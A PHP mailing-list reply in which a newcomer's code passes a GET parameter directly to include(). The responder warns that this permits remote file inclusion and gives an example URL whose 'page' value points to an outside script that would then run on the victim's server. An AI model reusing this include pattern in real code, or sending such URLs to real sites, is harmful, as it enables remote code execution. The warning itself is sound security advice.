> if (isset($page)) {
> include $$_GET['page'];
> } else {
> $page = $home;
> include $page;
> }
>
> would that be right?
> or should i use
>
> if (isset($page)) {
> include $$_GET['page'];
> } else {
> include $home;
> }
>
> hopefully that's right. if so, pretty good for a n00b
>
I don't think I'd let someone pass any page they wanted via a get and just
include that page.
If you have URL fopen wrappers on I can create a page on my server and
include it to your page and pretty much execute any code I want on your
server.
example:
http://www.yourdomain.com?yourscript.php?page=http://mydomain.com/myscript.p
hp
Now my code is included in your page and executed. Do you really trust me
to only have nice code in my page?
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
